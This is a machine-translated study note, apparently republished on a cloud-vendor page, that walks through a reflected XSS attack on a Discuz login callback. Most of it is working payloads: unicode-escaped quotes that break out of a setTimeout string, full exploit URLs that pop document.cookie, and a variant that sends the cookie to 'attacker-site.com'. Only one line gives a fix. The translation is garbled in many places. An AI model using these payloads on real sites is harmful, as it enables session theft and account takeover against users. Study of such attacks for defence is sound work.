Home > Developer > Web Develop

XSS Study Notes (4)-vulnerability exploitation process

Source: Internet
Author: User
Tags openid
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more > 

<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a'; alert(document.cookie);a='';", 3000);</script>


1. in this example (which has already been supplemented), we hope you will also understand that the XSS context is important and how to properly construct it based on the context, using unfiltered characters, it is the key to success (there must be enough cumbersome ideas)
Http://www.discuz.net/connect.php? Receive = yes & mod = login & op = callback & referer = aaaaaaaaa & oauth_token = 17993859178940955951 & openid = signature & oauth_signature = signature % 3D & oauth_signature code = 3738504772 & timestamp = 1354305802

2. this is an account registered for testing. Let's go to F12 to check the source code. The first idea is to look at the context, find the original context in the context, and then close and bypass the original context. After the source code, ctrl + f search for locations where you can control input (such as accounts and personal information)

3. See: 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./aaaaaaaaaaa';", 3000);</script>...   <a href ="http://www.discuz.net/./aaaaaaaaaaa" >
4. double quotation marks (double quotation marks) or single quotation marks (single quotation marks) are required for both context and context. You can try aaaaaaaaaaaaa to register an account name, or directly use a URL to simulate your account and such information to see if an error is returned, after the experiment, it cannot be done. Yes, it is impossible to leave such a large vulnerability for us.

5. then let's look back at the first function parameter. setTimeout (executable script, delayed time) function, that is, this function will execute the first parameter of the function as a script, then we try to close the single quotes, and in the URL & referfer = aaaaaaaaaaa '& oauth_signature ....

6. But it has been filtered out. Changed to window. location. href = 'HTTP: // www.discuz.net/./aaaaaaaaaaa&%039%'; ", 3000.

7. I believe that my own ideas are not cumbersome enough. We can see that the first parameter of setTimeout () is a string. As mentioned in the previous tutorial, In the JS string, characters can also be expressed as unicode, that is, single quotes can also be expressed as \ u0027 or \ x27. Hope you can come and agree to the different encoding closure methods of the characters, lz filtered? Try it,

In the URL:
& Referfer = aaaaaaaaaaa \ & oauth_signature ....

Result: 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./aaaaaaaaaaa\';", 3000);</script>
Da XI: If the filter is not used, the escape character can be used by the client.
The old idea is as follows:

Change the single quotation marks in the original quotation marks to \ u0027 or \ x27. 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a\u0027; alert(document.cookie);a=\u0027\u0027;", 3000);</script>

8. In URL:
Http://www.discuz.net/connect.php? Receive = yes & mod = login & op = callback & referer = a \ u0027; alert (document. cookie); & oauth_token = 17993859178940955951 & openid = signature & oauth_signature = a6DLYVhIXQJeXiXkf7nVdbgntm4 % 3D & oauth_1_code = 3738504772 & timestamp = 1354305802

After the command is executed, the cookie pops up directly. What else can be said? Here is the POC !!!

9. If you change the original alert (), direct it to your own xss platform.
For example, change to window. location. href = 'www .attacker-site.com? C = '+ document. cookie +'; 'will jump to another page, leading to loading failure.

Therefore, we need to improve: 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);//';", 3000);</script>
The above is similar to the one I wrote earlier, click hijacking, modify the href code of the client, replace the single quotes, and the plus signs. 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//';", 3000);</script>
In the URL:
Http://www.discuz.net/connect.php? Receive = yes & mod = login & op = callback & referer = a \ u0027.replace (/. \ u002b/,/javascript: alert (document. cookie )/. source); // & oauth_token = 17993859178940955951 & openid = signature & oauth_signature = a6DLYVhIXQJeXiXkf7nVdbgntm4 % 3D & oauth_authorization code = 3738504772 & timestamp = 1354305802

In this way, the loading will not fail due to the jump.

Looking at these trivial examples, these reflection ideas are actually nested. Then, according to the context bypass idea, practice makes perfect. Let's take the Xss as much as possible.

This solution is to filter \ and then OK.

For Json XSS (http://blog.csdn.net/l_f0rm4t3d/article/details/23851071) Please refer to this article I have written

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
cissp study notes pdf pmp study notes xss vulnerability test 5 4 patch notes vulnerability assessment process flowchart vulnerability remediation process 5 4 notes

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More